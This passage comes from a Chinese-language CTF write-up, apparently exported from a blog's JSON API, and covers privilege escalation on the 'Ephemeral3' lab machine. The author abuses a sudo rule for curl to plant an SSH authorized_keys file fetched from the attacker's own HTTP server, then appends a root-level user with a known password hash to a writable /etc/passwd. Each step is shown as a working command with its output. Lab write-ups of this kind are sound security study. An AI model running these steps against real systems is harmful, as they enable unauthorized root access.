\/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>curl\u63d0\u6743<\/h3>\n<p>\u4fe1\u606f\u641c\u96c6\u53d1\u73b0\uff1a<\/p>\n<pre><code class=\"language-bash\">randy@ephemeral:~$ sudo -l\nMatching Defaults entries for randy on ephemeral:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser randy may run the following commands on ephemeral:\n    (henry) NOPASSWD: \/usr\/bin\/curl<\/code><\/pre>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/curl\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/curl\/#sudo<\/a><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218551.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218551.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430221141139\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5c1d\u8bd5\u63d0\u6743\uff0c\u672c\u5730\u751f\u6210\u5bc6\u94a5\uff0c\u4fdd\u5b58\u516c\u94a5\u5230<code>henry<\/code>\u7684\u76ee\u5f55\u4e2d\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ ssh-keygen -t rsa -f \/home\/kali\/temp\/Ephemeral3\/henry         \nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/Ephemeral3\/henry\nYour public key has been saved in \/home\/kali\/temp\/Ephemeral3\/henry.pub\nThe key fingerprint is:\nSHA256:4RT9r7wkCW2I\/Zi9wrlvdQsAeSXfgG5qfM0sGsIxlZk kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 3072]----+\n|        .*.oo    |\n|        E.+o o   |\n|       .o+ .. .  |\n|      o= ++ .    |\n|     ..+Soo= .   |\n|      o =Bo.* o  |\n|       +o==+.+ . |\n|        = .+o .  |\n|        .=o ..   |\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ mv henry.pub authorized_keys                               \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ python3 -m http.server 8888\nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n192.168.0.145 - - [30\/Apr\/2024 09:52:25] &quot;GET \/authorized_keys HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-bash\">randy@ephemeral:~$ sudo -u henry \/usr\/bin\/curl http:\/\/192.168.0.143:8888\/authorized_keys -o \/home\/henry\/.ssh\/authorized_keys\n  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current\n                                 Dload  Upload   Total   Spent    Left  Speed\n100   563  100   563    0     0  10826      0 --:--:-- --:--:-- --:--:-- 10826<\/code><\/pre>\n<p>\u5c1d\u8bd5\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218552.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404302218552.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240430221335928\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>\u4fee\u6539\/etc\/passwd\u63d0\u6743<\/h3>\n<pre><code class=\"language-bash\">henry@ephemeral:~$ sudo -l\n[sudo] password for henry: \nhenry@ephemeral:~$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/sbin\/pppd\n\/usr\/bin\/newgrp\n\/usr\/bin\/passwd\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/sudo\n\/usr\/bin\/fusermount\n\/usr\/bin\/chsh\n\/usr\/bin\/umount\n\/usr\/bin\/su\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/vmware-tools\/bin32\/vmware-user-suid-wrapper\n\/usr\/lib\/vmware-tools\/bin64\/vmware-user-suid-wrapper\n\/usr\/lib\/xorg\/Xorg.wrap\n\/usr\/lib\/snapd\/snap-confine\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/policykit-1\/polkit-agent-helper-1\n\/home\/randy\/Desktop\/vmware-tools-distrib\/lib\/bin32\/vmware-user-suid-wrapper\n\/home\/randy\/Desktop\/vmware-tools-distrib\/lib\/bin64\/vmware-user-suid-wrapper\n\/snap\/core20\/1328\/usr\/bin\/chfn\n\/snap\/core20\/1328\/usr\/bin\/chsh\n\/snap\/core20\/1328\/usr\/bin\/gpasswd\n\/snap\/core20\/1328\/usr\/bin\/mount\n\/snap\/core20\/1328\/usr\/bin\/newgrp\n\/snap\/core20\/1328\/usr\/bin\/passwd\n\/snap\/core20\/1328\/usr\/bin\/su\n\/snap\/core20\/1328\/usr\/bin\/sudo\n\/snap\/core20\/1328\/usr\/bin\/umount\n\/snap\/core20\/1328\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1328\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/core20\/1518\/usr\/bin\/chfn\n\/snap\/core20\/1518\/usr\/bin\/chsh\n\/snap\/core20\/1518\/usr\/bin\/gpasswd\n\/snap\/core20\/1518\/usr\/bin\/mount\n\/snap\/core20\/1518\/usr\/bin\/newgrp\n\/snap\/core20\/1518\/usr\/bin\/passwd\n\/snap\/core20\/1518\/usr\/bin\/su\n\/snap\/core20\/1518\/usr\/bin\/sudo\n\/snap\/core20\/1518\/usr\/bin\/umount\n\/snap\/core20\/1518\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/snap\/core20\/1518\/usr\/lib\/openssh\/ssh-keysign\n\/snap\/snapd\/21465\/usr\/lib\/snapd\/snap-confine\nhenry@ephemeral:~$ ls -l \/etc\/shadow\n-rw-r----- 1 root shadow 1724 Jun 23  2022 \/etc\/shadow\nhenry@ephemeral:~$ ls -l \/etc\/passwd\n-rw-rw-r-- 1 root henry 2891 Jun 24  2022 \/etc\/passwd\nhenry@ephemeral:~$ id\nuid=1001(henry) gid=1001(henry) groups=1001(henry)<\/code><\/pre>\n<p>\u672c\u5730\u751f\u6210\u4e00\u4e0b\uff0c\u7136\u540e\u6dfb\u52a0\u8fdb\u53bb\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3]\n\u2514\u2500$ openssl passwd -1 -salt hack hack\n$1$hack$xR6zsfvpez\/t8teGRRSNr.<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4fee\u6539\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">henry@ephemeral:~$ ls\nuser.txt\nhenry@ephemeral:~$ cat user.txt \n9c8e36b0cb30f09300592cb56bca0c3a\nhenry@ephemeral:~$ cat \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash<\/code><\/pre>\n<pre><code class=\"language-bash\">henry@ephemeral:~$ echo &#039;hack:$1$hack$xR6zsfvpez\/t8teGRRSNr.:0:0:root:\/root:\/bin\/bash&#039; &gt;&gt; \/etc\/passwd\nhenry@ephemeral:~$ su hack\nPassword: \nroot@ephemeral:\/home\/henry# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ephemeral:\/home\/henry# cd \/root\nroot@ephemeral:~# ls -la\ntotal 40\ndrwx------  7 root root 4096 Jun 23  2022 .\ndrwxr-xr-x 20 root root 4096 Jun 23  2022 ..\nlrwxrwxrwx  1 root root    9 Jun 23  2022 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3106 Dec  5  2019 .bashrc\ndrwx------  2 root root 4096 Jun 23  2022 .cache\ndrwx------  3 root root 4096 Jun 23  2022 .config\ndrwxr-xr-x  3 root root 4096 Jun 23  2022 .local\n-rw-r--r--  1 root root  161 Dec  5  2019 .profile\n-rw-r--r--  1 root root   33 Jun 23  2022 root.txt\ndrwx------  3 root root 4096 Jun 23  2022 snap\ndrwxr-xr-x  2 root root 4096 Jun 23  2022 .ssh\nroot@ephemeral:~# cat root.txt \nb0a3dec84d09f03615f768c8062cec4d<\/code><\/pre>\n<p>\u62ff\u5230rootshell\uff01\uff01\uff01\uff01<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ephemeral3 \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Ephemeral3] [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-672","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/672","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=672"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/672\/revisions"}],"predecessor-version":[{"id":673,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/672\/revisions\/673"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=672"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=672"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=672"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}